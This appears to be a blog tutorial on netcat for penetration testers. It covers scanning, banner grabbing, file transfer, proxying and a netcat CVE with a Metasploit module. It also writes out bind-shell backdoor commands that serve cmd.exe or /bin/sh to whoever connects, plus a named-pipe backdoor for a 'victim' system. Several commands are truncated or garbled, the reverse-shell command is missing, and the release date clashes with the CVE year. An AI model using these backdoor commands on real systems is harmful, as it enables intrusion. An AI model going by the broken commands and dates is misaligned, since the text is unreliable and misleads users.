Introduction: If you are a penetration tester then netcat is one of the most used tools of yours. For over 20 years, this tiny but powerful tool has been used by hackers for a wide-range of activities. It’s so powerful and useful, that many people within the hacking community refer to it as the “Swiss Army knife of hacking tools.” Hobbit makes our habit to use this tool for black hat as well as white hat purpose.
Netcat was designed to be a network analysis tool. Created by a l33t only known as “Hobbit,” he gave away this tool to the IT community without compensation, but has received scores of accolades. Salute to Hobbit!
Originally coded for UNIX, and despite not originally being maintained on a regular basis, Netcat has been rewritten into a number of versions and implementations. It has been ported to a number of operating systems, but is most often seen on various Linux distributions as well as Microsoft Windows.
Download and install netcat:
On Windows, netcat can be downloaded from:
On Ubuntu/Linux, Ubuntu synaptic package has netcat-OpenBSD and netcat-traditional packages available. Install both of them.
$ sudo apt-get install netcat-traditional netcat-openbsd
In the above picture left side help file is for linux and right side is for windows.
To demonstrate further, There are two machine:
- Windows XP SP2 [192.168.0.104]
- Linux Mint [192.168.0.106]
Port Opening: To open a particular port, netcat has its own command:
nc -l -p PORT
here -l used for listening and -p is for port and 4444 is the local port number to be opened.
In the above image, netstat command shows that nc opened port 4444.
Port Scanning: An example is “
nc -v -w 2 -z TARGET 135, 445” Netcat will try connecting to port 135 and 445 at the target. The -z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe.
Banner Grabbing: Banner grabbing is an enumeration technique, which is designed to determine the brand, version, operating system, or other relevant information about a particular service or application. This is especially important if you are looking for a vulnerability associated with a particular version of some service.
The syntax of a banner grab is not unlike the standard Netcat command line. Run Netcat in client mode, list the appropriate hostname, and finally list the port number of the appropriate service.
File Transfer: One common use for Netcat is for transferring files. Netcat has the ability to both pull and push files.
Consider the following example:
nc -l -p 12345 < textfile
In this case, Netcat is started in server mode on local port 12345, and is offering textfile.
A client who connects to this server is pulling the file from the server, and will receive textfile:
nc SOURCE_IP 12345 > textfile
Chat Interface: We stated at the outset that Netcat is a networking program designed to read and write data across connections. Perhaps the easiest way to understand how this works is to simply set up a server and client. In one terminal window, start the server:
nc -l -p PORT
In a second machine, connect to the server with the client:
nc SERVER SERVER_PORT The result is a very elementary chat interface.
Text entered on one side of the connection is simply sent to the other side of the connection when you hit enter. Notice there is nothing to indicate the source of the text, only the output is printed.
Proxy Server: It is possible to use the netcat program to create a TCP proxy server and monitor the traffic. By using following two commands we can set an TCP proxy server using netcat:
$ mknod backpipe p
$ nc -l -p 80 backpipe
This listens on port 80 and redirect on remote port 8080. Incoming traffic will be present in the incoming.txt , outgoing traffic in the outgoing.txt file.The named pipe is needed for the connection to be bi-directional.
Backdoor / Bind Shell: To set a backdoor in victim’s system netcat is one of the most reliable choice. netcat comes with an option called
-e which enables a remote application to be opened while an remote user connects to the opened port.
Bind shell is a good choice to an attacker only when victim’s system can be accessed via open internet.
If victim’s system is windows:
nc -l -p PORT -e cmd.exe
If victim’s system is linux:
nc -l -p PORT -e /bin/sh
For any of those two cases, in attacker machine:
nc VICTIM_IP VICTIM_PORT
Backdoor without ‘-e’: Now it might possible, for security reason many linux distributions are having netcat without -e option so that any attacker could not create any backdoor. In that scenario, we can run following two lines in our victim’s linux system to get our desired backdoor:
$ mknod /tmp/backpipe p
$ /bin/sh 0/tmp/backpipe
Here, We’ve first made a named pipe (also called a FIFO) called backpipe using the mknod command. The mknod command lets us create things in the file system, and here I’m creating something called “backpipe” that is of type “p”, which is a named pipe. Alternatively, we could have used the mkfifo command available on some Linuxes and Unix variants, leaving off the p option. This FIFO will be used to shuttle data back to our shell’s input. We created my backpipe in /tmp because pretty much any account is allowed to write there.
Then, We invoke shell (/bin/sh), the most common shell available on all kinds of Linuxes and Unixes, pulling its standard input from the backpipe (0/tmp/backpipe). On most shells, you can dispense with the 0 syntax, but on occasion, We’ve seen some weird shells where it doesn’t work unless you use 0. I always throw them in, just to make sure it’ll work.
In this case, in attacker machine following command should be run first:
nc -l -p ATTACKER_PORT
Reverse Shell: A very popular usage of Netcat and probably the most common use from penetration testing perspective are reverse shells and bind shells. A reverse shell is a shell initiated from the target host back to the attack box which is in a listening state to pick up the shell.
Here Attacker machine is Win XP SP2 and Victim system is Linux Mint. Attacker opens its port 6667 and runs the reverse shell command in victim’s system. As a result Windows XP is having the control of linux mint via reverse shell. Reverse shell is always a better option when victim is under firewall or within inteanet.
Vulnerability within NetCat:
YES!!! You read it right. Hobbit released stable version of netcat v1.10 on 2nd January 2007. This version was having Stack-based buffer overflow in doexec.c for Windows. When running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command. The CVE id is CVE-2004-1317.
To exploit this issue metasploit has its own exploit module: exploit/windows/misc/netcat110_nt
in Victim Machine (192.168.0.104):
nc -Lp 31337 -e ftp
here ftp is an application as for example, you can use any other application.
In Attacker machine:
Netcat is an open source, popular tool which has been modified by different developers. They made different variant of netcat with different names and extra features. Here is some cousins of netcat:
- Ncat: Ncat was written for the Nmap Project as a much-improved re implementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. Ncat is integrated with Nmap and is available in the standard Nmap download packages (including source code and Linux, Windows, and Mac binaries) available from the Nmap download page.
- Socat: A utility similar to the old netcat that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 – raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.
- Cryptcat: one of the major problem of netcat is its communication is in clear text mode. Cryptcat is the standard netcat enhanced with twofish encryption with ports for Windows NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix. TCP/IP swiss army knife extended with twofish encryption – Cryptcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
- Powercat: Powercat is defined as powershell version of netcat. It brings the functionality and power of Netcat to all recent versions of Microsoft Windows. It accomplishes this goal by using native PowerShell version 2 components. This allows easy deployment, use, and little chance of being caught by traditional anti- virus solutions. Additionally, the latest versions of Powercat include advanced functionality that goes well beyond those found in traditional forms of Netcat.
- Pnetcat: pnetcat is a Python reimplementation of the basic idea of the netcat program. It’s fast because it relies on large block sizes and TCP windows. It can read from a file or socket, and can write to a file or socket, in any combination you like.
Conclusion: In this article I wanted to cover as much as information regarding netcat from history to present. It is an essential and must have tool for all pen-tester. After going through my article I believe you can understand different netcat functionalities, security issue that was present on netcat v1.10, different netcat like tools etc. Hope you like this and comment bellow.